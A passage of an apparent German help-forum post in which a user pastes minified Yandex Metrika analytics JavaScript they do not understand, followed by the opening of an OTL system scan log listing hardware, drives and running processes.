function B(a){return Math.floor(Math.random()*("number"==typeof a?a:1E6))}function O(a){for(var b=+new Date,c=1;0<c;c++)if(0==c%1E3){var e=+new Date;if(b>e)break;if(e-b>a)break}}function Z(a,b){if(!a||!b)return!1;for(var c=[],e=0;e<b.length;e++)c.push(b[e].replace(/\^/g,"\\^").replace(/\$/g,"\\$").replace(/\./g,"\\.").replace(/\[/g,"\\[").replace(/\]/g,"\\]").replace(/\|/g,"\\|").replace(/\(/g,"\\(").replace(/\)/g,"\\)").replace(/\?/g,"\\?").replace(/\*/g,"\\*").replace(/\+/g,"\\+").replace(/\{/g,

"\\{").replace(/\}/g,"\\}"));return RegExp("\\.("+c.join("|")+")$","i").test(a)}function V(a,k){var c=k.target,e=!1;if(!k.hostname)return!1;if(!c||"_self"==c||"_top"==c||"_parent"==c)e=!0;(c=a.shiftKey||a.ctrlKey||a.altKey)||a.modifiers&&b.Event&&(c=a.modifiers&b.Event.CONTROL_MASK||a.modifiers&b.Event.SHIFT_MASK||a.modifiers&b.Event.ALT_MASK);return e&&!c}function U(a,b,c,e,g){function j(a,b){G[G.length]=a;G[G.length]=b}g=g||{};c="undefined"!=typeof c?c:qa;var G=[];g.ar&&!g.onlyData&&(c=J(c),a=J(a));

j("page-ref",y(c,sa));j("page-url",y(a,sa));j("browser-info",C(b,g));Sa()?j("ut",ya):"undefined"!=typeof g.ut&&j("ut",y(""+g.ut,gb));e&&j("site-info",y(v(e),hb));g.saveRef&&(qa=c);a=W(ua,G);Ca()||((new Image).src=a,fa(a),g.isDelay&&O(g.delay));return a}function W(a,b){for(var c=["rn",B(),"cnt-class",q].concat(b),e=[],g=0;g<c.length;g+=2){var j=c[g+1];j&&(e[e.length]=c[g]+"="+j)}return Ha+a+w+"?"+e.join("&")}function J(a){var b=z(),c=b.host,b=b.href;if(!a)return b;if(-1!=a.search(/^\w+:\/\//))return a;

var e=a.charAt(0);if("?"==e)return e=b.search(/\?/),-1==e?b+a:b.substr(0,e)+a;if("#"==e)return e=b.search(/#/),-1==e?b+a:b.substr(0,e)+a;if("/"==e){if(e=b.search(c),-1!=e)return b.substr(0,e+c.length)+a}else return c=b.split("/"),c[c.length-1]=a,c.join("/");return a}function fa(a){"function"==typeof b.ymLog&&b.ymLog(a)}function C(d,k){function c(a,b){a&&b&&(e[e.length]=[a,b].join(":"))}k=k||{};var e=[],g=-1*(new Date).getTimezoneOffset(),j;j=new Date;j=[j.getFullYear(),j.getMonth()+1,j.getDate(),

j.getHours(),j.getMinutes(),j.getSeconds()];for(var G="",q=0;q<j.length;q++)G+=10>j[q]?"0"+j[q]:j[q];j=G;cb||(cb=j,yb=g);c("j",ca.javaEnabled()?"1":"");la&&c("s",la.width+"x"+la.height+"x"+(la.colorDepth||la.pixelDepth));if(null===Ia){var q=G=null,h,n=b.navigator;if("undefined"!=typeof n.plugins&&"object"==typeof n.plugins["Shockwave Flash"])(G=n.plugins["Shockwave Flash"].description)&&!("undefined"!=typeof n.mimeTypes&&n.mimeTypes["application/x-shockwave-flash"]&&!n.mimeTypes["application/x-shockwave-flash"].enabledPlugin)&&

(q=G.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,"."));else if("undefined"!=typeof b.ActiveXObject)try{if(h=new ActiveXObject("ShockwaveFlash.ShockwaveFlash"))(G=h.GetVariable("$version"))&&(q=G.split(" ")[1].replace(/,/g,".").replace(/[^.\d]/g,""))}catch(w){}Ia=q}c("f",Ia);h=-1;a.documentElement&&"CSS1Compat"==a.compatMode?h=a.documentElement.clientWidth:a.body&&(h=a.body.clientWidth);G=-1;a.documentElement&&"CSS1Compat"==a.compatMode?G=a.documentElement.clientHeight:a.body&&(G=a.body.clientHeight);

c("w",h+"x"+G);c("z",g);c("i",j);if(null===Ja){g=null;if(b.ActiveXObject)try{var f=new ActiveXObject("AgControl.AgControl");h=function(a,b,d,c){for(;a.isVersionSupported(b[0]+"."+b[1]+"."+b[2]+"."+b[3]);)b[d]+=c;b[d]-=c};j=[1,0,0,0];h(f,j,0,1);h(f,j,1,1);h(f,j,2,1E4);h(f,j,2,1E3);h(f,j,2,100);h(f,j,2,10);h(f,j,2,1);h(f,j,3,1);g=j.join(".")}catch(pa){}else if(f=ca.plugins["Silverlight Plug-In"])g=f.description;Ja=g}c("l",Ja||"");c("en",(""+(a.characterSet||a.charset||"")).toLowerCase());c("v",Bb);

c("c",ca.cookieEnabled?"1":"");ra&&a.documentMode&&(null===va&&(va=Function("return /*@cc_on @_jscript_version @*/;")()),va&&c("jv",va));c("la",(ca&&(ca.language||ca.browserLanguage)||"").toLowerCase());c("ex","prerender"==a.webkitVisibilityState?"pre1":"");X&&c("wh","1");g="ar ln dl ad nb pa".split(" ");for(f=0;f<g.length;f++)h=g[f],c(h,k[h]?"1":"");g=["va","vt","sn","sa","he"];k.nb&&g.push("cl");for(f=0;f<g.length;f++)h=g[f],c(h,k[h]);c("hid",na);if(!k.ar){a:{if(f=(f=b.performance||b.webkitPerformance)&&

f.timing)if(g=f.navigationStart){h=[f.domainLookupEnd-f.domainLookupStart,f.connectEnd-f.connectStart,f.responseStart-f.requestStart,f.responseEnd-f.responseStart,f.fetchStart-g];f.loadEventStart&&h.push(f.loadEventStart-g);f=h.join(",");break a}f=""}c("ds",f)}if(t._webvisor){b.name||(b.name=Math.round(65535*Math.random()));if(f=+b.name)0>f&&(f*=-1),f%=65535;c("wn",f||Da(b.name));try{b.history&&c("hl",String(b.history.length))}catch(l){}}f="undefined"==typeof d?(f=r())?y(f,ib):"":y(d,ib);c("t",f);

return e.join(":")}function r(){var b=a.title;"string"!=typeof b&&(b=(b=a.getElementsByTagName("title"))&&b.length?b[0].innerHTML:"");return b}function da(b){var k=!1;if(b&&"string"!=typeof b&&b.length)for(var c=0;c<b.length;c++){var e=b[c].selector,g=b[c].text,j=e.charAt(0),e=e.slice(1);if("#"==j){if(j=a.getElementById(e))k=!0,j.innerHTML=g}else if("."==j){j=e;e=(e=void 0)||a;if(e.getElementsByClassName)j=e.getElementsByClassName(j);else{for(var e=e.getElementsByTagName("*"),h=[],q=0;q<e.length;q++)lb(e[q],

j)&&h.push(e[q]);j=h}for(e=0;e<j.length;e++)k=!0,j[e].innerHTML=g}}return k}function oa(a){var b={delay:za};switch(typeof a){case "string":b.on=!0;break;case "object":b.on=!0;b.delay="number"!=typeof a.delay?za:a.delay;break;case "boolean":b.on=a;break;default:return}M=b}function ia(){Fa=qa=Ea;U(z().href,r(),Fa,null,{ut:Ga,ad:1==q&&b.Ya&&b.Ya.Direct?!0:!1,wh:!0,saveRef:!0});Ea=z().href}function Ba(d){function k(){var b=a.documentElement;return Math.max(b.scrollWidth,a.body.scrollWidth,b.clientWidth)}

function c(a){return a.toString().toUpperCase()}function e(a){return a&&(a=""+a.className)&&-1!=a.search(/ym-clickmap-ignore/)?!0:!1}function g(b){if(null==b.pageX&&null!=b.clientX){var d=a.documentElement,c=a.body;b.pageX=b.clientX+(d&&d.scrollLeft||c&&c.scrollLeft||0)-(d.clientLeft||0);b.pageY=b.clientY+(d&&d.scrollTop||c&&c.scrollTop||0)-(d.clientTop||0)}return{x:b.pageX,y:b.pageY}}function j(a){for(var b=c(a.nodeName);a.parentNode&&"BODY"!=b&&"HTML"!=b;){if("A"==b||"INPUT"==b||"TEXTAREA"==b)return!0;

a=a.parentNode;b=a.nodeName}return!1}for(var h=this,q=0,r=null,n="A B BIG BODY BUTTON DD DIV DL DT EM FIELDSET FORM H1 H2 H3 H4 H5 H6 HR I IMG INPUT LI OL P PRE SELECT SMALL SPAN STRONG SUB SUP TABLE TBODY TD TEXTAREA TFOOT TH THEAD TR U UL ABBR AREA BLOCKQUOTE CAPTION CENTER CITE CODE CANVAS DFN EMBED FONT INS KBD LEGEND LABEL MAP OBJECT Q S SAMP STRIKE TT ARTICLE AUDIO ASIDE FOOTER HEADER MENU METER NAV PROGRESS SECTION TIME VIDEO NOINDEX NOBR".split(" "),t=59,f=String.fromCharCode,pa={},l=0;l<

n.length;l++)pa[n[l]]=f(t),f(t),t++;this.handler=function(d){var f=a.getElementsByTagName("body")[0];if(!b.ymDisabledClickmap&&!e(f)){if(h._prefs.hasQuota){if(!h._prefs.quota)return;h._prefs.quota--}var l=d.target||d.srcElement;3==l.nodeType&&(l=l.parentNode);var f=c(l.nodeName),u=g(d),x;!d.which&&d.button!==ma&&(d.which=d.button&1?1:d.button&2?3:d.button&4?2:0);x=d.which;if(x=!((2==x||3==x)&&"A"!=f))if(x=l.offsetHeight,x=!(0===l.offsetWidth&&0===x||l.style&&"none"===l.style.display)){b:{for(x=l;x.parentNode;){if(e(x)){x=

!0;break b}x=x.parentNode}x=!1}if(x=!x){b:{x=h._prefs.ignoreTags;for(var n=0;n<x.length;n++)if(c(x[n])==c(f)){x=!0;break b}x=!1}x=!x&&h._prefs.filter(l,f)}}if(x){f=+new Date;l={dom:l,x:u.x,y:u.y,time:f};if(u=50<f-q)if(!(u=!h._prefs.ignoreSameClicks)){if(u=r){x=Math.abs(u.x-l.x);var n=Math.abs(u.y-l.y),t=l.time-u.time,u=u.dom==l.dom&&2>x&&2>n&&1E3>t?!0:!1}else u=!1;u=!u}if(u&&!Ca()){x=g(d);u=x.x;x=x.y;var n=d.target||d.srcElement,w=h._prefs,v;if(n.getBoundingClientRect){t=n.getBoundingClientRect();

v=a.body;var E=a.documentElement,A=t.left+(b.pageXOffset||E.scrollLeft||v.scrollLeft)-(E.clientLeft||v.clientLeft||0),t={top:Math.round(t.top+(b.pageYOffset||E.scrollTop||v.scrollTop)-(E.clientTop||v.clientTop||0)),left:Math.round(A)}}else{t=n;for(E=v=0;t;)v+=parseInt(t.offsetTop),E+=parseInt(t.offsetLeft),t=t.offsetParent;t={top:v,left:E}}v=t;E="";t=z().href;switch(w.mode){case "fixed":E="0";j(n)&&(E+="u");break;case "centered":E="1";w=Math.floor(k()/2);u=u>w?u-w+32768:u;j(n)&&(E+="u");break;default:w=

c(n.nodeName);w="BODY"==w||"HTML"==w?k():n.offsetWidth;E=c(n.nodeName);"BODY"==E||"HTML"==E?(E=a.documentElement,E=Math.max(E.scrollHeight,a.body.scrollHeight,E.clientHeight)):E=n.offsetHeight;w||(w=1);E||(E=1);u=Math.floor(65535*(u-v.left)/w);x=Math.floor(65535*(x-v.top)/E);for(w="";n.parentNode&&"BODY"!=c(n.nodeName)&&"HTML"!=c(n.nodeName);){w+=pa[n.nodeName]||"*";b:{v=n.parentNode;for(A=E=0;A<v.childNodes.length;A++)if(n.nodeName==v.childNodes[A].nodeName){if(n==v.childNodes[A]){v=E;break b}E++}v=

0}w+=v||"";n=n.parentNode}E=y(w,128)}X||(t=t?t.replace(/\#.*$/,""):t);"function"==typeof h._prefs.urlFilter&&(t=h._prefs.urlFilter(t));u=W(Ta,["page-url",y(t,sa),"pointer-click","x:"+u+":y:"+x+":t:"+Math.floor(Math.floor(+new Date-Cb)/100)+":p:"+E]);(new Image).src=u;fa(u);if(u=d.target||d.srcElement){3==u.nodeType&&(u=u.parentNode);for(x=c(u.nodeName);u.parentNode&&u.parentNode.nodeName&&("A"!=x&&"AREA"!=x||!u.href);)u=u.parentNode,x=c(u.nodeName);u=!u.href?!1:u}else u=!1;u&&V(d,u)&&O(h._prefs.delay)}q=

f;r=l}}};this.setPrefs=function(a){function b(){return!0}this._prefs="undefined"==typeof a||!1===a||!0===a?{filter:b,ignoreTags:[],mode:"",delay:za,quota:0,hasQuota:!1,ignoreSameClicks:!0}:{filter:a.filter||b,ignoreTags:a.ignoreTags||[],mode:a.mode||"",delay:"undefined"==typeof a.delay?za:a.delay,quota:a.quota||0,hasQuota:!!a.quota,ignoreSameClicks:"undefined"==typeof a.ignoreSameClicks?!0:!1,urlFilter:a.urlFilter}};this.updateStatus=function(a){switch(typeof a){case "undefined":this.start(!0);break;

case "boolean":a?this.start(a):this.stop();break;case "object":this.start(a)}};this._start=!1;this.start=function(b){this.setPrefs(b);this._start||A(a,"click",this.handler);this._start=!0};this.stop=function(){this._start&&I(a,"click",this.handler);this._start=!1};this.start(d)}var t=this,na=Math.round(1073741824*Math.random()),ua="//mc.yandex.ru/watch/",Ta="//mc.yandex.ru/clmap/",P,Ga="",Ha=xa,qa=T.href,Ea=T.href,Fa="",L;Ya._metrika.counter||(Ya._metrika.counter=t);"object"==typeof w&&(L=w,h=w.defer,

Ga=w.ut,q=w.type,n=w.params,Ha=w.onlyHttps?"https:":xa,w=w.id);w=w||0;q=q||0;P=w+":"+q;if(Ya._metrika.counters[P])return Ya._metrika.counters[P];var ga=[],Ia=null,Ja=null,va=null,Ka=new function(d,k,c){function e(a,d,c){if(h)g(h,j(a,d,0),c,"application/x-www-form-urlencoded");else{if("XMLHttpRequest"in b){var e=new XMLHttpRequest;if("withCredentials"in e){var k=c?"POST":"GET";a=j(a,d,"POST"==k?1:0);e.open(k,a,!0);e.withCredentials=!0;"POST"==k&&!Sb&&e.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

e.send("POST"==k?kb(c):null);return}}for(k in c)c.hasOwnProperty(k)&&(d[k]=c[k]);(new Image).src=j(a,d,0)}}function g(a,b,d,c){var e="ifr"+Math.round(1E10*Math.random()),g=a.createElement("div");g.style.position="absolute";g.style.left="-99999px";g.style.top="-99999px";b=['<iframe name="',e,'"></iframe>','<form action="',b,'" method="post" target="',e,'" enctype="',c,'">'];for(var k in d)d.hasOwnProperty(k)&&N(b,'<textarea name="',k,'"></textarea>');N(b,"</form>");g.innerHTML=b.join("");a.body.appendChild(g);

k=g.getElementsByTagName("form")[0];for(var j in d)d.hasOwnProperty(j)&&(k[j].value=d[j]);k.submit();setTimeout(function(){a.body.removeChild(g)},1E4)}function j(a,b,e){b["browser-info"]=["ct",e,b["browser-info"]].join(":");return d+"//"+k+"/"+a+"/"+c+"?"+kb(b)}try{var h;if(b.ActiveXObject){var n=new ActiveXObject("htmlfile");n.open();n.write("<html><body></body></html>");n.close();h=n}else h=null}catch(q){}var t="",r=[];return{send:function(a,b,d,c){a?t?-1<t.indexOf("|"+a+"|")&&e(b,d,c):N(r,arguments):

e(b,d,c)},sendMultipart:function(b,d,c,e){g(h||a,j(b,d,e),c,"multipart/form-data")},init:function(a){t="|"+a.join("|")+"|";for(a=0;a<r.length;a++)-1<t.indexOf("|"+r[a][0]+"|")&&e(r[a][1],r[a][2],r[a][3]);r.length=0}}}(Ha,"mc.yandex.ru",w),H;t.replacePhones=function(){try{var a=ta("_ym_mp2_substs_"+w);if(a){var b=(new Function("return "+a))();b&&da(b)}}catch(c){}};t.reachGoal=function(b,k){var c=b?"goal://"+z().hostname+"/"+b:z().href,e=r(),g=b?z().href:a.referrer;U(c,e,g,k,{ar:!0,isDelay:b?!0:!1,

delay:100});return!0};var M;t.trackLinks=oa;t.hit=function(a,b,c,e,g){a&&U(a,b,c,e,{ut:g,ar:!0,saveRef:!0})};t.params=function(a){if(a){var b=arguments.length;if(1<b){for(var c={},e=c,g=0;g<b-1;g++){var j=""+arguments[g];e[j]={};g<b-2&&(e=e[j])}e[j]=arguments[b-1];a=c}U("","","",a,{ar:!0,pa:!0,onlyData:!0})}};t.file=function(a,b,c,e){a&&U(a,"",z().href,e,{ar:!0,ln:!0,dl:!0})};t.extLink=function(a,b,c,e){a&&U(a,"",z().href,e,{ar:!0,ln:!0,ut:ya})};t.notBounce=function(){var a=0;Ra&&Aa&&(a=Aa-Ra);U("",

"","",null,{cl:a,ar:!0,nb:!0,onlyData:!0})};var Q=[];t.addFileExtension=function(a){"string"==typeof a?Q.push(a):Q=Q.concat(a)};t.clickmap=function(a){t._clickmap?t._clickmap.updateStatus(a):t._clickmap=new Ba(a)};var La=!1;t.accurateTrackBounce=function(d){function k(){t.notBounce()}if(!La){La=!0;var c=a.referrer,e=z().href,g=function(a){a=a.split(":");a=a[1]||"";a=a.replace(/^\/*/,"").replace(/^www\./,"");return a.split("/")[0]};if(!(!c||!e?!c&&!e:g(c)==g(e)))if("number"!=typeof d&&(d=15E3),ra)setTimeout(k,

d);else{var j=d,h=function(){if(!m){l&&clearTimeout(l);var a=j-(w?f:f+ +new Date-v);0>a&&(a=0);l=setTimeout(function(){m=!0;n(!1);k()},a)}};d=function(){r||(q=!0,w=!1,r=!0,h())};var n=function(a){for(var b=0;b<s.length;b+=3)a?A(s[b],s[b+1],s[b+2]):I(s[b],s[b+1],s[b+2])},q=!1,r=!1,w=!0,f=0,v=+new Date,l=null,m=!1,s=[b,"blur",function(){w=q=r=!0;f+=+new Date-v;v=+new Date;h()},b,"focus",function(){!q&&!r&&(f=0);v=+new Date;q=r=!0;w=!1;h()},a,"click",d,a,"mousemove",d,a,"keydown",d,a,"scroll",d];n(!0);

h()}}};var Ma=null,X=!1;t.trackHash=function(a){if(!1===a)X&&("onhashchange"in b?I(b,"hashchange",ia):clearInterval(Ma),X=!1);else if(!X){if("onhashchange"in b)A(b,"hashchange",ia);else{var k=function(){var a=z().hash.split("#")[1];if("undefined"==typeof a)return!1;var b=a.indexOf("?");0<b&&(a=a.substring(0,b));return a},c=k();(function g(){var a=k();a!==c&&(ia(),c=a);Ma=setTimeout(g,200)})()}X=!0}t._trackHash=X};t.video=function(a,b,c,e){var g=["end","play","pause","seek"];if(a&&c){a:{for(var j=

0,h=g.length;j<h;j+=1)if(a===g[j]){g=j;break a}g=-1}-1!==g&&U(c,e||"","",null,{ar:!0,va:a,vt:~~b})}};t.social=function(a,b,c){a&&b&&U(c||z().href,"","",null,{ar:!0,sn:y(a,64),sa:y(b,64)})};t.enableAll=function(){t.trackLinks(!0);t.clickmap(!0);t.accurateTrackBounce()};t.pause=O;t.uploadPage=function(){};if(w)a:{var R=!1;if(Ya._metrika.hitParam[P])if(1==q&&!Ya._metrika.counters[P])R=!0;else break a;Ya._metrika.counters[P]=t;Ya._metrika.hitParam[P]=1;t._webvisor=!h&&(L&&L.webvisor||!1);L&&L.trackHash&&

t.trackHash(!0);if(!h&&!R){t.replacePhones();var S=ta("_ym_visorc");"b"!=S&&"w"!=S&&(S="");aa("_metrika_enabled","1",60);h=!!ta("_metrika_enabled");aa("_metrika_enabled","",-1);h||(S="b");Ra=+new Date;h=T.href;P=r();var Y=a.referrer,R={ut:Ga,he:L?~~L.httpError:0,ad:1==q&&b.Ya&&b.Ya.Direct?!0:!1,saveRef:!0},Na=S,$=function(a,b){ka[ka.length]=a;ka[ka.length]=b},R=R||{},Y="undefined"!=typeof Y?Y:qa,ka=[];R.ar&&!R.onlyData&&(Y=J(Y),h=J(h));if(!Ca()){var ja="_ymjsp"+("--"==w?"":B()),ba=a.createElement("script");

b[ja]=function(d){try{delete b[ja]}catch(k){b[ja]=ma}Aa||(Aa=+new Date);d=d||{};var c=d.webvisor||{},e=[];if(H){var g=+c.recp;if(!isFinite(g)||0>g||1<g)S="w";S||(S=na%1E4/1E4<g?"w":"b");aa("_ym_visorc",S,30);"w"==S?(N(e,"visor"),g=c.arch_type,(c=c.urls)&&g&&H.uploadPages(c,g)):H.stop()}Ka.init(e);c=d.mp2;e=w;d=t;aa("_ym_mp2_substs_"+e,"",-1);if(c){g="_ym_mp2_track_"+e;a:{var j=c.conditions;if(j&&j.length)for(var h=0;h<j.length;h++){var n;if("ref"==j[h].type)b:{n=j[h];for(var r=a.referrer||"",q=n.patterns,

y=0;y<q.length;y++)if(r.match(RegExp(q[y]))){var f=n.params||[];if(f.length)for(var z=decodeURIComponent((RegExp.$1||"").replace(/\+/g,"%20")),l=0;l<f.length;l++){if(z==decodeURIComponent(f[l])){n=!0;break b}}else{n=!0;break b}}n=!1}else if(n="adv"==j[h].type){r=j[h];z=r.ServiceNamePattern;q=r.RefererPattern;n=r.direct_camp;y=a.referrer;l=(l=T.search)&&l.replace(/^\?/,"");f={};if(l)for(var l=l.split("&"),m=0;m<l.length;m++){var s=l[m].split("=");f[decodeURIComponent(s[0])]=decodeURIComponent(s[1])}l=

void 0;b:{s=T.search;m=T.hash;s=s&&s.replace(/^\?/,"");m=m&&m.replace(/^#/,"");l="";if(s)for(var s=s.split("&"),D=0;D<s.length;D++){var u=s[D].split("=");"_openstat"==u[0]&&(l=u[1])}m&&0==m.indexOf("_openstat=")&&(l=m.slice(10));if(l){m=void 0;if(-1<l.indexOf(";"))m=decodeURIComponent(l);else c:{for(;l.length%4;)l+="=";var x=void 0,B=void 0,C=void 0,C=s=m=B=x=void 0,D=0,u="";do{x="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(l.charAt(D++));B="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(l.charAt(D++));

m="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(l.charAt(D++));s="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(l.charAt(D++));if(0>x||0>B||0>m||0>s){m=null;break c}C=x<<18|B<<12|m<<6|s;x=C>>16&255;B=C>>8&255;C&=255;u=64==m?u+String.fromCharCode(x):64==s?u+String.fromCharCode(x,B):u+String.fromCharCode(x,B,C)}while(D<l.length);l=u;m="";for(D=c1=c2=s=0;s<l.length;)D=l.charCodeAt(s),128>D?(m+=String.fromCharCode(D),s++):191<D&&224>D?(c2=l.charCodeAt(s+

1),m+=String.fromCharCode((D&31)<<6|c2&63),s+=2):(c2=l.charCodeAt(s+1),c3=l.charCodeAt(s+2),m+=String.fromCharCode((D&15)<<12|(c2&63)<<6|c3&63),s+=3)}l=m}if(l&&(l=l.split(";"),4==l.length)){l={service:l[0],campaign:l[1],ad:l[2],source:l[3]};break b}l=null}m={};s=["source","medium","campaign","term","content"];for(D=0;D<s.length;D++)f["utm_"+s[D]]&&(m[s[D]]=f["utm_"+s[D]]);D=l&&l.service||m.source;s=!1;if(!s&&z&&z.length)for(u=0;u<z.length;u++)if(RegExp(z[u]).test(D)){s=!0;break}if(!s&&q&&q.length)for(z=

0;z<q.length;z++)if(RegExp(q[z]).test(y)){s=!0;break}!s&&(r.google_adwords&&f.gclid)&&(s=!0);if(s&&(n&&n.length)&&(s=!1,r=l&&l.campaign||m&&m.campaign))for(q=0;q<n.length;q++)if(n[q]==r){s=!0;break}n=s}if(n){j[h].track_id&&aa(g,j[h].track_id,43200);break a}}}if((g=ta(g))&&c.substs)if(c=c.substs[g])aa("_ym_mp2_substs_"+e,v(c)),e=da(c),d.params("__ym",e?"mp_trackid":"mp_trackid_bad",g)}A(b,"load",t.replacePhones);t._inited=!0;ba.parentNode&&ba.parentNode.removeChild(ba)};$("wmode",5);$("callback",ja);

$("page-ref",y(Y,sa));$("page-url",y(h,sa));h=C(P,R);Na&&(h=["vc",Na,h].join(":"));$("browser-info",h);Sa()?$("ut",ya):"undefined"!=typeof R.ut&&$("ut",y(""+R.ut,gb));n&&$("site-info",y(v(n),hb));R.saveRef&&(qa=Y);h=W(ua,ka);ba.type="text/javascript";ba.src=h;P=a.getElementsByTagName("head")[0];P.insertBefore(ba,P.firstChild);fa(h)}}oa(!1);A(a,"click",function(a){if(M.on){var b=function(a){var b=Db(c.innerHTML?c.innerHTML.toString().replace(/<\/?[^>]+>/gi,""):"");U(j,j==b?"":b,z().href,null,a)},c;

var e=a.target||a.srcElement;if(e){3==e.nodeType&&(e=e.parentNode);for(var g=e.nodeName.toString().toLowerCase();e.parentNode&&e.parentNode.nodeName&&("a"!=g&&"area"!=g||!e.href);)e=e.parentNode,g=e.nodeName.toString().toLowerCase();c=e.href?e:!1}else c=!1;if(c){var e=!1,j=""+c.href,g=j?j.split(/\?/)[0]:"";if(jb.test(g)||jb.test(j)||Z(j,Q)||Z(g,Q))e=!0;var h=c.className,g=h&&-1!=h.search(/ym-disable-tracklink/)?!0:!1,h=h&&-1!=h.search(/ym-external-link/)?!0:!1;g||(a={ln:!0,dl:e,isDelay:V(a,c),delay:M.delay},

h?b(a):(g=z().hostname,h=c.hostname,(g?g.replace(/^www\./,""):"")==(h?h.replace(/^www\./,""):"")?e&&(a.ln=!1,b(a)):j&&-1!=j.search(/^ *javascript:/i)||(a.ut=ya,b(a))))}}});L&&(L.enableAll?t.enableAll():(L.clickmap&&t.clickmap(L.clickmap),L.trackLinks&&t.trackLinks(L.trackLinks),L.accurateTrackBounce&&t.accurateTrackBounce(L.accurateTrackBounce),L.ad&&ad()));t._webvisor&&(H=new mb(w,q,L,na,Ka,t))}};b.ya_cid&&new Ya.Metrika(b.ya_cid,b.ya_params,b.ya_class);b.ya_cid&&!b.ya_hit&&(b.ya_hit=function(a,

b){Ya._metrika.counter&&Ya._metrika.counter.reachGoal(a,b)});var I=b.yandex_metrika_callback,V=b.yandex_metrika_callbacks;"function"==typeof I&&I();if("object"==typeof V)for(I=0;I<V.length;I++){var da=V[I];da&&(V[I]=null,da())}oa("yandex_metrika_callback");oa("yandex_metrika_callbacks");V=["link","click","scroll","res"];for(I=0;I<V.length;I++)if(da=V[I]+"map",-1!=T.href.search("ym_playback="+da)){ia(xa+"//metrika.yandex.ru/js/"+da+"/_loader.js");break}b.Ya.Metrika.informer=function(a){var b=!!Ya.Metrika._informer;

Ya.Metrika._informer=a;b||ia(xa+"//mc.yandex.ru/metrika/informer.js")};if(top!=b&&parent==top&&b.postMessage&&!Ya.Metrika_visorPlayerOn){Ya.Metrika_visorPlayerOn=!0;I=a.createElement("div");I.innerHTML='<iframe name="RemoteIframe" allowtransparency="true" style="position: absolute; left: -999px; top: -999px; width: 1px; height: 1px;"></iframe>';var Ba=I.firstChild;setTimeout(function(){var b=a.body||a.documentElement;b.insertBefore(Ba,b.firstChild);try{var n=Ba.contentWindow.document}catch(q){}n&&

(n.open(),n.write('<!doctype html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7,IE=edge" /></head><body><script type="text/javascript">var newversion = true;try {if (top.postMessage) {window.onmessage = function(evt) {evt = evt || window.event;try {var message = new Function("return " + evt.data)();} catch (e) {return;}if (/(^|\\.)yandex\\.(ru|com|ua|kz|by|com\\.tr)(:\\d{4})?$/.test(evt.origin) && message.name == "script" && message.data) {var head = document.getElementsByTagName("head")[0];var base = document.createElement("base");base.href = message.data;head.appendChild(base);var script = document.createElement("script");script.src = message.data;head.appendChild(script);if (navigator.userAgent.indexOf("Firefox/3.6.") > -1) {parent.removeEventListener("message", window.onmessage, false);}window.onmessage = null;}};if (navigator.userAgent.indexOf("Firefox/3.6.") > -1) {parent.addEventListener("message", window.onmessage, false);}top.postMessage(\'{"name":"ping"}\', "*");}} catch (e) {}\x3c/script></body></html>'),

n.close())},500)}})(this,this.document);

Leider verstehe ich von dem Zeug nur sehr wenige. Ich hatte war mal ein bisschen XHTML, PHP und JavaScript, aber wirklich beschäftigt habe ich mich mit dem ganzen Kram noch nie. Vielleicht hilft das ja in irgendeiner Art und Weise weiter.

Hier der neue Log:

Code:

OTL logfile created on: 11.06.2013 15:27:04 - Run 2

OTL by OldTimer - Version 3.2.69.0     Folder = d:\Users\Dani\Desktop

64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.16576)

Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

 

7,96 Gb Total Physical Memory | 5,32 Gb Available Physical Memory | 66,84% Memory free

15,96 Gb Paging File | 13,30 Gb Available in Paging File | 83,35% Paging File free

Paging file location(s): d:\pagefile.sys 8192 8192 [binary data]

 

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)

Drive C: | 111,69 Gb Total Space | 73,82 Gb Free Space | 66,09% Space Free | Partition Type: NTFS

Drive D: | 931,51 Gb Total Space | 801,82 Gb Free Space | 86,08% Space Free | Partition Type: NTFS

Drive E: | 931,51 Gb Total Space | 642,10 Gb Free Space | 68,93% Space Free | Partition Type: NTFS

 

Computer Name: DANI-PC | User Name: Dani | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

 
 ========== Processes (SafeList) ==========

 

PRC - [2013.06.11 15:17:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- d:\Users\Dani\Desktop\OTL.exe

PRC - [2013.06.03 19:14:09 | 000,144,384 | ---- | M] (Adobe Systems Inc.) -- D:\Spiele\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.26\deploy\LolClient.exe

PRC - [2013.05.23 18:35:24 | 000,920,472 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe

PRC - [2013.05.14 20:09:31 | 001,855,880 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_7_700_202.exe

PRC - [2013.05.11 12:37:26 | 000,065,640 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

PRC - [2013.04.16 16:10:44 | 019,662,744 | ---- | M] (Google) -- C:\Program Files (x86)\Google\Drive\googledrivesync.exe

PRC - [2013.01.18 09:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe

PRC - [2013.01.15 01:00:00 | 002,578,312 | ---- | M] (Cerulean Studios) -- C:\Program Files (x86)\Trillian\trillian.exe

PRC - [2012.06.28 17:41:58 | 002,206,888 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files (x86)\Winamp\winamp.exe

